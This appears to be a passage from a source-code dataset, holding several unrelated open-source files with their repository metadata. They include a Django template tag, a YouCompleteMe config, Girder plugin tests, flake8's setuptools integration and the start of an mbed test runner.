"bytes": "24481"
},
{
"name": "DIGITAL Command Language",
"bytes": "26402"
},
{
"name": "HTML",
"bytes": "130698"
},
{
"name": "JavaScript",
"bytes": "10616"
},
{
"name": "M4",
"bytes": "223087"
},
{
"name": "Makefile",
"bytes": "197108"
},
{
"name": "Objective-C",
"bytes": "2098686"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "PostScript",
"bytes": "13803"
},
{
"name": "PowerShell",
"bytes": "1372"
},
{
"name": "Python",
"bytes": "24948876"
},
{
"name": "Roff",
"bytes": "254942"
},
{
"name": "Shell",
"bytes": "437386"
},
{
"name": "TeX",
"bytes": "323102"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
} |
from django import template
from django.urls import reverse
from blargg.models import Entry
register = template.Library()
@register.simple_tag
def entry_archive_year_url():
"""Renders the ``entry_archive_year`` URL for the latest ``Entry``."""
entry = Entry.objects.filter(published=True).latest()
arg_list = [entry.published_on.strftime("%Y")]
return reverse('blargg:entry_archive_year', args=arg_list)
| {
"content_hash": "5cf2c8b1b7f6eee87c74fa6093937422",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 74,
"avg_line_length": 32.53846153846154,
"alnum_prop": 0.723404255319149,
"repo_name": "bradmontgomery/django-blargg",
"id": "e1f471b26c5ad9c6957df5d6479fda14213e3b11",
"size": "423",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blargg/templatetags/blargg_tags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "5238"
},
{
"name": "Python",
"bytes": "45518"
}
],
"symlink_target": ""
} |
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
#'-Wextra',
'-Werror',
#'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++11',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# You can add the specified directory to the search path for
# system include files.
'-isystem', '/usr/lib/clang/3.8.0/include/',
'-isystem', '/opt/include',
'-I', '/opt/include',
# You can add the specified directory to the search path for
# include files.
#'-I',
#'/usr/include/gmock',
'-I',
'/home/ialbrekh/Projects/polivalka/polivalka/src/',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
| {
"content_hash": "a71ed045bab22833252b01336b722d2b",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 80,
"avg_line_length": 32.96527777777778,
"alnum_prop": 0.6854855698335791,
"repo_name": "elalfer/IoT-Cronus",
"id": "03931f0959ef87db1fd65590911dc8581a3a8ed9",
"size": "6147",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/.ycm_extra_conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "30333"
},
{
"name": "Makefile",
"bytes": "1326"
},
{
"name": "Python",
"bytes": "6147"
},
{
"name": "Shell",
"bytes": "303"
}
],
"symlink_target": ""
} |
import re
def _findIndex(_list, _object, startIndex=0):
index = startIndex
while index < len(_list):
line = _list[index].strip()
line = line.replace(' ', '')
if line == _object:
return index
index += 1
return -1
def _getSections(lines, tag, sections=None, remove=False):
if sections is None:
sections = {}
i = 0
while i < len(lines):
line = lines[i].strip()
line = line.replace(' ', '')
if re.match(tag, line):
name = line[len(tag):]
if name in sections:
raise Exception("Duplicate Tag: {}".format(name))
end = _findIndex(lines, line.replace('Begin', 'End', 1), i)
if end == -1:
print('Could not find an End for tag {}\n'.format(name))
return False
if remove:
del lines[i+1:end]
else:
sections.setdefault(name, [])
if end > i+1:
sections[name].extend(lines[i+1:end])
i += 1
return True
class Parser:
def __init__(self, fileName):
with open(fileName, 'r') as file:
self.lines = file.readlines()
self.generatorCode = {}
self.userCodeTag = '//UserCodeBegin'
self.generatorCodeTag = '//GeneratorCodeBegin'
def setCommentStr(self, comment):
self.userCodeTag = '{}UserCodeBegin'.format(comment)
self.generatorCodeTag = '{}GeneratorCodeBegin'.format(comment)
def parseUserCode(self):
self.userCode = {}
status = _getSections(self.lines, self.userCodeTag, self.userCode)
return status
def parseSourceCode(self, fileName):
with open(fileName, 'r') as sourceFile:
db_lines = sourceFile.readlines()
status = _getSections(db_lines, self.generatorCodeTag,
self.generatorCode)
return status
def cleanCode(self):
status = _getSections(self.lines, self.generatorCodeTag, remove=True)
return status
def writeInFile(self, fileName):
for section in self.generatorCode:
db_lines = self.generatorCode[section]
j = 0
while j < len(db_lines):
line = db_lines[j].strip().replace(' ', '')
if re.match(self.userCodeTag, line):
name = line[len(self.userCodeTag):]
if name in self.userCode:
db_lines[j+1:j+1] = self.userCode[name]
j += 1
self.generatorCode[section] = db_lines
i = 0
while i < len(self.lines):
line = self.lines[i].strip()
line = line.replace(' ', '')
if re.match(self.generatorCodeTag, line):
name = line[len(self.generatorCodeTag):]
self.generatorCode.setdefault(name, [])
self.lines[i+1:i+1] = self.generatorCode[name]
i += 1
with open(fileName, 'w') as out:
out.write(''.join(self.lines))
return True
| {
"content_hash": "d339c26fb98979a439962690cd55dc82",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 77,
"avg_line_length": 33.03191489361702,
"alnum_prop": 0.52914653784219,
"repo_name": "The-OpenROAD-Project/OpenROAD",
"id": "74f047ca67dd2e3e2070e151c44f9962c60703eb",
"size": "3105",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/odb/src/codeGenerator/parser.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "679482"
},
{
"name": "C++",
"bytes": "18429342"
},
{
"name": "CMake",
"bytes": "148596"
},
{
"name": "Cuda",
"bytes": "7441"
},
{
"name": "Dockerfile",
"bytes": "3754"
},
{
"name": "Python",
"bytes": "245126"
},
{
"name": "Ruby",
"bytes": "498"
},
{
"name": "SWIG",
"bytes": "314266"
},
{
"name": "Shell",
"bytes": "39400"
},
{
"name": "Tcl",
"bytes": "1767673"
},
{
"name": "Verilog",
"bytes": "51524137"
},
{
"name": "Yacc",
"bytes": "496743"
}
],
"symlink_target": ""
} |
import hashlib
import six
import time
from girder.exceptions import ValidationException
from girder.models.file import File
from girder.models.folder import Folder
from girder.models.setting import Setting
from girder.models.upload import Upload
from girder.models.user import User
from tests import base
import girder_hashsum_download as hashsum_download
def setUpModule():
base.enabledPlugins.append('hashsum_download')
base.startServer()
def tearDownModule():
base.stopServer()
class HashsumDownloadTest(base.TestCase):
def setUp(self):
base.TestCase.setUp(self, assetstoreType='filesystem')
# Two users are created (user and otherUser).
# A hierarchy is created as is:
# - user:
# |- [Folder (public)] publicFolder:
# |- publicFile
# |- duplicatePublicFile
# |- [Folder (private)] private:
# |- privateFile
# |- privateOnlyFile
#
# - otherUser:
# |- (nothing)
#
# In summary, user has access to all the files and otherUser to none.
self.user = User().createUser(
login='leeloo',
password='multipass',
firstName='Leeloominai',
lastName='Sebat',
email='quinque@universe.org'
)
for folder in Folder().childFolders(parent=self.user, parentType='user', user=self.user):
if folder['public'] is True:
self.publicFolder = folder
else:
self.privateFolder = folder
self.userData = u'\u266a Il dolce suono mi ' \
u'colp\u00ec di sua voce! \u266a'.encode('utf8')
self.privateFile = Upload().uploadFromFile(
obj=six.BytesIO(self.userData),
size=len(self.userData),
name='Il dolce suono - PRIVATE',
parentType='folder',
parent=self.privateFolder,
user=self.user,
mimeType='audio/mp4'
)
self.publicFile = Upload().uploadFromFile(
obj=six.BytesIO(self.userData),
size=len(self.userData),
name='Il dolce suono - PUBLIC',
parentType='folder',
parent=self.publicFolder,
user=self.user,
mimeType='audio/flac'
)
self.duplicatePublicFile = Upload().uploadFromFile(
obj=six.BytesIO(self.userData),
size=len(self.userData),
name='Il dolce suono - PUBLIC DUPLICATE',
parentType='folder',
parent=self.publicFolder,
user=self.user,
mimeType='audio/mp3'
)
self.privateOnlyData =\
u'\u2641 \u2600 \u2601 \u2614 \u2665'.encode('utf8')
self.privateOnlyFile = Upload().uploadFromFile(
obj=six.BytesIO(self.privateOnlyData),
size=len(self.privateOnlyData),
name='Powers combined',
parentType='folder',
parent=self.privateFolder,
user=self.user,
mimeType='image/png'
)
self.otherUser = User().createUser(
login='zorg',
password='mortis',
firstName='Jean-Baptiste',
lastName='Zorg',
email='nullus@universe.org'
)
@staticmethod
def _hashSum(value, algorithm):
hasher = hashlib.new(algorithm)
hasher.update(value)
return hasher.hexdigest()
def _download(self, hashValue, hashAlgorithm,
user=None, params=None, additionalHeaders=None):
return self.request(
path='/file/hashsum/%s/%s/download' % (hashAlgorithm, hashValue),
method='GET',
user=user,
params=params,
additionalHeaders=additionalHeaders,
isJson=False
)
def _testNormalUse(self, hashValue, hashAlgorithm, file, data, user=None):
resp = self._download(hashValue, hashAlgorithm, user=user)
self.assertStatusOk(resp)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
self.assertEqual(resp.headers['Content-Length'], file['size'])
self.assertEqual(resp.headers['Content-Type'], file['mimeType'])
self.assertEqual(resp.headers['Content-Disposition'],
'attachment; filename="%s"' % file['name'])
self.assertEqual(resp.headers['Content-Type'], file['mimeType'])
self.assertEqual(data, self.getBody(resp, text=False))
def testDownload(self):
# Test an invalid algorithm
resp = self._download('crc32', '1a2b3c4d', user=self.user)
self.assertStatus(resp, 400)
for hashAlgorithm in ['sha512']:
publicDataHash = self._hashSum(self.userData, hashAlgorithm)
privateDataHash = self._hashSum(self.privateOnlyData, hashAlgorithm)
# Test normal use
for hashValue in [publicDataHash.lower(), publicDataHash.upper()]:
for algo in [hashAlgorithm.lower(), hashAlgorithm.upper()]:
self._testNormalUse(
hashValue, algo, self.publicFile, self.userData
)
# Test a non-existent file (in this case, one that's empty)
empty_hash = self._hashSum(b'', hashAlgorithm)
resp = self._download(empty_hash, hashAlgorithm)
self.assertStatus(resp, 404)
# Test a private file anonymously
resp = self._download(privateDataHash, hashAlgorithm)
self.assertStatus(resp, 404)
# Test a private file when unauthorized
resp = self._download(
privateDataHash, hashAlgorithm, user=self.otherUser
)
self.assertStatus(resp, 404)
# Test a private file when authorized
resp = self._download(
privateDataHash, hashAlgorithm, user=self.user
)
self.assertStatusOk(resp)
self.assertEqual(
self.privateOnlyData, self.getBody(resp, text=False))
# Test for a file that exists in both public and private folder
# while logged in.
self._testNormalUse(
publicDataHash,
hashAlgorithm,
self.privateFile,
self.userData,
user=self.user
)
# Test specified content dispositions
for contentDisposition in ['attachment', 'inline']:
disposition = {
'contentDisposition': contentDisposition
}
resp = self._download(
publicDataHash, hashAlgorithm, params=disposition
)
self.assertStatusOk(resp)
self.assertEqual(resp.headers['Content-Disposition'],
'%s; filename="%s"' %
(contentDisposition, self.publicFile['name']))
self.assertEqual(self.userData,
self.getBody(resp, text=False))
# Test downloading with an offset
resp = self._download(
publicDataHash, hashAlgorithm, params={'offset': 15})
self.assertStatus(resp, 206)
self.assertEqual(self.userData[15:],
self.getBody(resp, text=False))
# Test downloading with a range header and query range params
respHeader = self._download(
publicDataHash, hashAlgorithm,
additionalHeaders=[('Range', 'bytes=10-29')]
)
respQuery = self._download(
publicDataHash, hashAlgorithm,
params={'offset': 10, 'endByte': 30}
)
for resp in [respHeader, respQuery]:
self.assertStatus(resp, 206)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
self.assertEqual(resp.headers['Content-Length'], 30 - 10)
self.assertEqual(resp.headers['Content-Range'],
'bytes 10-29/%d' % len(self.userData))
self.assertEqual(resp.headers['Content-Type'],
self.publicFile['mimeType'])
self.assertEqual(self.userData[10:30],
self.getBody(resp, text=False))
def testKeyFile(self):
# Make sure sha512 appears in returned file documents
resp = self.request('/file/%s' % self.publicFile['_id'])
self.assertStatusOk(resp)
self.assertEqual(resp.json['sha512'], self.publicFile['sha512'])
template = '/file/%s/hashsum_file/%s'
# Test with bad algo
resp = self.request(template % (self.publicFile['_id'], 'foo'))
self.assertStatus(resp, 400)
six.assertRegex(self, resp.json['message'], '^Invalid value for algo: "foo"')
# Should work with public file
resp = self.request(template % (self.publicFile['_id'], 'sha512'),
isJson=False)
self.assertStatusOk(resp)
respBody = self.getBody(resp)
self.assertEqual(respBody, '%s\n' % self.publicFile['sha512'])
self.assertEqual(len(respBody), 129)
# Should not work with private file
resp = self.request(template % (self.privateFile['_id'], 'sha512'))
self.assertStatus(resp, 401)
six.assertRegex(self, resp.json['message'], '^Read access denied')
def testAutoComputeHashes(self):
with self.assertRaises(ValidationException):
Setting().set(hashsum_download.PluginSettings.AUTO_COMPUTE, 'bad')
old = hashsum_download.SUPPORTED_ALGORITHMS
hashsum_download.SUPPORTED_ALGORITHMS = {'sha512', 'sha256'}
Setting().set(hashsum_download.PluginSettings.AUTO_COMPUTE, True)
file = Upload().uploadFromFile(
obj=six.BytesIO(self.userData), size=len(self.userData), name='Another file',
parentType='folder', parent=self.privateFolder, user=self.user)
start = time.time()
while time.time() < start + 15:
file = File().load(file['_id'], force=True)
if 'sha256' in file:
break
time.sleep(0.2)
expected = hashlib.sha256()
expected.update(self.userData)
self.assertIn('sha256', file)
self.assertEqual(file['sha256'], expected.hexdigest())
expected = hashlib.sha512()
expected.update(self.userData)
self.assertIn('sha512', file)
self.assertEqual(file['sha512'], expected.hexdigest())
hashsum_download.SUPPORTED_ALGORITHMS = old
def testManualComputeHashes(self):
Setting().set(hashsum_download.PluginSettings.AUTO_COMPUTE, False)
old = hashsum_download.SUPPORTED_ALGORITHMS
hashsum_download.SUPPORTED_ALGORITHMS = {'sha512', 'sha256'}
self.assertNotIn('sha256', self.privateFile)
expected = hashlib.sha256()
expected.update(self.userData)
# Running the compute endpoint should only compute the missing ones
resp = self.request(
'/file/%s/hashsum' % self.privateFile['_id'], method='POST', user=self.user)
self.assertStatusOk(resp)
self.assertEqual(resp.json, {
'sha256': expected.hexdigest()
})
# Running again should be a no-op
resp = self.request(
'/file/%s/hashsum' % self.privateFile['_id'], method='POST', user=self.user)
self.assertStatusOk(resp)
self.assertEqual(resp.json, None)
file = File().load(self.privateFile['_id'], force=True)
self.assertEqual(file['sha256'], expected.hexdigest())
hashsum_download.SUPPORTED_ALGORITHMS = old
def testGetByHash(self):
hashAlgorithm = 'sha512'
publicDataHash = self._hashSum(self.userData, hashAlgorithm)
privateDataHash = self._hashSum(self.privateOnlyData, hashAlgorithm)
# There are three files with publicDataHash for self.user .
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, publicDataHash), user=self.user)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 3)
for file in resp.json:
self.assertEqual(file['sha512'], publicDataHash)
# There is one file with privateDataHash for self.user .
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, privateDataHash), user=self.user)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
for file in resp.json:
self.assertEqual(file['sha512'], privateDataHash)
# There are two files with publicDataHash for self.otherUser .
# There is one private file with this hash that otherUser lacks access to.
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, publicDataHash), user=self.otherUser)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 2)
for file in resp.json:
self.assertEqual(file['sha512'], publicDataHash)
# No files with privateDataHash for self.otherUser .
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, privateDataHash), user=self.otherUser)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 0)
| {
"content_hash": "c9a7b55e93a80b0d6d730aeb8d5c4171",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 97,
"avg_line_length": 38.94236311239193,
"alnum_prop": 0.5818841115962406,
"repo_name": "kotfic/girder",
"id": "7374b4971034b798314f63bc972e801759400016",
"size": "14307",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/hashsum_download/plugin_tests/hashsum_download_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "38260"
},
{
"name": "CSS",
"bytes": "54843"
},
{
"name": "Dockerfile",
"bytes": "2482"
},
{
"name": "HCL",
"bytes": "1424"
},
{
"name": "HTML",
"bytes": "139763"
},
{
"name": "JavaScript",
"bytes": "1129529"
},
{
"name": "Mako",
"bytes": "7873"
},
{
"name": "Python",
"bytes": "2117090"
},
{
"name": "Roff",
"bytes": "17"
},
{
"name": "Ruby",
"bytes": "9921"
},
{
"name": "Shell",
"bytes": "2177"
}
],
"symlink_target": ""
} |
"""
HTML Dialog.
Licensed under MIT
Copyright (c) 2013 - 2017 Isaac Muse <isaacmuse@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
import wx
from ..localization import _
from .. import gui
from ..controls import webview
class HTMLDialog(gui.HtmlDialog, webview.WebViewMixin):
"""HTML dialog."""
def __init__(
self, parent, content, title=None, content_type=webview.HTML_FILE,
min_width=500, min_height=500, max_width=-1, max_height=-1
):
"""Initialize dialog."""
super().__init__(parent)
self.setup_html(self.m_content_html, control_title=self)
self.SetSizeHints(wx.Size(min_width, min_height), wx.Size(max_width, max_height))
self.localize()
self.load(content, title, content_type)
self.Fit()
self.Centre()
def load(self, content, title=None, content_type=webview.HTML_FILE):
"""Reshow the dialog."""
self.refresh_localization()
self.load_html(self.m_content_html, content, title, content_type)
def localize(self):
"""Translate strings."""
self.TITLE = _("Untitled")
def refresh_localization(self):
"""Localize dialog."""
self.SetTitle(self.TITLE)
self.Fit()
def on_cancel(self, event):
"""Close dialog."""
self.Close()
| {
"content_hash": "bf64b8b0134083a1a16087ef2221a9d8",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 113,
"avg_line_length": 36.15625,
"alnum_prop": 0.6992221261884183,
"repo_name": "facelessuser/Rummage",
"id": "95d9bbd77711356d09ac297337900d336233ba6c",
"size": "2314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rummage/lib/gui/dialogs/html_dialog.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "31788"
},
{
"name": "HTML",
"bytes": "146911"
},
{
"name": "JavaScript",
"bytes": "17430"
},
{
"name": "Python",
"bytes": "1087411"
}
],
"symlink_target": ""
} |
"""The logic for Flake8's integration with setuptools."""
from distutils import log
import os
from typing import List, Tuple
import setuptools
from flake8.main import application as app
UNSET = object()
class Flake8(setuptools.Command):
"""Run Flake8 via setuptools/distutils for registered modules."""
description = "Run Flake8 on modules registered in setup.py"
# NOTE(sigmavirus24): If we populated this with a list of tuples, users
# could do something like ``python setup.py flake8 --ignore=E123,E234``
# but we would have to redefine it and we can't define it dynamically.
# Since I refuse to copy-and-paste the options here or maintain two lists
# of options, and since this will break when users use plugins that
# provide command-line options, we are leaving this empty. If users want
# to configure this command, they can do so through config files.
user_options = [] # type: List[str]
def initialize_options(self):
"""Override this method to initialize our application."""
self.flake8 = app.Application()
self.flake8.initialize([])
options = self.flake8.option_manager.options
for option in options:
if option.parse_from_config:
setattr(self, option.config_name, UNSET)
def finalize_options(self):
"""Override this to parse the parameters."""
options = self.flake8.option_manager.options
for option in options:
if option.parse_from_config:
name = option.config_name
value = getattr(self, name, UNSET)
if value is UNSET:
continue
setattr(
self.flake8.options,
name,
option.normalize_from_setuptools(value),
)
def package_files(self):
"""Collect the files/dirs included in the registered modules."""
seen_package_directories = () # type: Tuple[str, ...]
directories = self.distribution.package_dir or {}
empty_directory_exists = "" in directories
packages = self.distribution.packages or []
for package in packages:
package_directory = package
if package in directories:
package_directory = directories[package]
elif empty_directory_exists:
package_directory = os.path.join(
directories[""], package_directory
)
# NOTE(sigmavirus24): Do not collect submodules, e.g.,
# if we have:
# - flake8/
# - flake8/plugins/
# Flake8 only needs ``flake8/`` to be provided. It will
# recurse on its own.
if package_directory.startswith(seen_package_directories):
continue
seen_package_directories += (package_directory + ".",)
yield package_directory
def module_files(self):
"""Collect the files listed as py_modules."""
modules = self.distribution.py_modules or []
filename_from = "{0}.py".format
for module in modules:
yield filename_from(module)
def distribution_files(self):
"""Collect package and module files."""
for package in self.package_files():
yield package
for module in self.module_files():
yield module
yield "setup.py"
def run(self):
"""Run the Flake8 application."""
self.flake8.run_checks(list(self.distribution_files()))
self.flake8.formatter.start()
self.flake8.report_errors()
self.flake8.report_statistics()
self.flake8.report_benchmarks()
self.flake8.formatter.stop()
try:
self.flake8.exit()
except SystemExit as e:
# Cause system exit only if exit code is not zero (terminates
# other possibly remaining/pending setuptools commands).
if e.code:
raise
finally:
self.announce(
"WARNING: flake8 setuptools integration is deprecated and "
"scheduled for removal in 4.x. For more information, see "
"https://gitlab.com/pycqa/flake8/issues/544",
log.WARN,
)
| {
"content_hash": "c8f588997bce11e13cac3f6e83a75f53",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 77,
"avg_line_length": 37.643478260869564,
"alnum_prop": 0.5952875952875953,
"repo_name": "TeamSPoon/logicmoo_workspace",
"id": "fde290e6f2c0b33e1ad3ae54e0245c1548cd3878",
"size": "4329",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "packs_web/butterfly/lib/python3.7/site-packages/flake8/main/setuptools_command.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "342"
},
{
"name": "C",
"bytes": "1"
},
{
"name": "C++",
"bytes": "1"
},
{
"name": "CSS",
"bytes": "126627"
},
{
"name": "HTML",
"bytes": "839172"
},
{
"name": "Java",
"bytes": "11116"
},
{
"name": "JavaScript",
"bytes": "238700"
},
{
"name": "PHP",
"bytes": "42253"
},
{
"name": "Perl 6",
"bytes": "23"
},
{
"name": "Prolog",
"bytes": "440882"
},
{
"name": "PureBasic",
"bytes": "1334"
},
{
"name": "Rich Text Format",
"bytes": "3436542"
},
{
"name": "Roff",
"bytes": "42"
},
{
"name": "Shell",
"bytes": "61603"
},
{
"name": "TeX",
"bytes": "99504"
}
],
"symlink_target": ""
} |
from django.test import TestCase, Client
from django.urls import reverse
from accounts.models import Account
class CoreTestCase(TestCase):
def setUp(self):
self.user = Account.objects.create_user('user', is_active=True)
self.client = Client()
def test_home_page(self):
"""Přihlášený uživatel vidí na adrese '/' domovskou stránku (home.html), zatímco nepřihlášený obrazovku s přihlašovacím odkazem (login.html)."""
# Anonymní uživatel
response = self.client.get('/')
self.assertEqual(response.templates[0].name, 'core/login.html')
self.assertIn('href=\"{}\"'.format(reverse('social:begin', args=('google-oauth2',))), str(response.content))
# Registrovaný uživatel
self.client.force_login(self.user)
response = self.client.get('/')
self.assertEqual(response.templates[0].name, 'core/home.html')
def test_login_required_middleware(self):
"""Testování 'LoginRequiredMiddleware' ve složce 'decorators.py' pro dostupnosti stránek bez a s přihlášením."""
# Bez přihlášení
response = self.client.get(reverse('social:begin', args=('google-oauth2',)))
self.assertEqual(response.status_code, 302)
response = self.client.get('/favicon.ico')
self.assertIn(response.status_code, {200, 301})
response = self.client.get(reverse('accounts:index'))
self.assertEqual(response.status_code, 404)
# S přihlášením
self.client.force_login(self.user)
response = self.client.get(reverse('social:begin', args=('google-oauth2',)))
self.assertEqual(response.status_code, 404)
response = self.client.get('/favicon.ico')
self.assertIn(response.status_code, {200, 301})
response = self.client.get(reverse('accounts:index'))
self.assertEqual(response.status_code, 200)
| {
"content_hash": "760ba422bc396534e5114ed09162a21c",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 152,
"avg_line_length": 38.3469387755102,
"alnum_prop": 0.6647152740819585,
"repo_name": "bugulin/gymgeek-web",
"id": "338c0403ff0fe8eefcf5c69195c46e78c01a3e98",
"size": "1914",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "5780"
},
{
"name": "HTML",
"bytes": "18125"
},
{
"name": "Python",
"bytes": "38442"
}
],
"symlink_target": ""
} |
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import optparse
import datetime
import threading
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename
from threading import Thread
from subprocess import Popen, PIPE
# Imports related to mbed build api
from workspace_tools.tests import TESTS
from workspace_tools.tests import TEST_MAP
from workspace_tools.paths import BUILD_DIR
from workspace_tools.paths import HOST_TESTS
from workspace_tools.utils import ToolException
from workspace_tools.utils import construct_enum
from workspace_tools.targets import TARGET_MAP
from workspace_tools.test_db import BaseDBAccess
from workspace_tools.build_api import build_project, build_mbed_libs, build_lib
from workspace_tools.build_api import get_target_supported_toolchains
from workspace_tools.libraries import LIBRARIES, LIBRARY_MAP
from workspace_tools.toolchains import TOOLCHAIN_BIN_PATH
from workspace_tools.test_exporters import ReportExporter, ResultExporterType
import workspace_tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
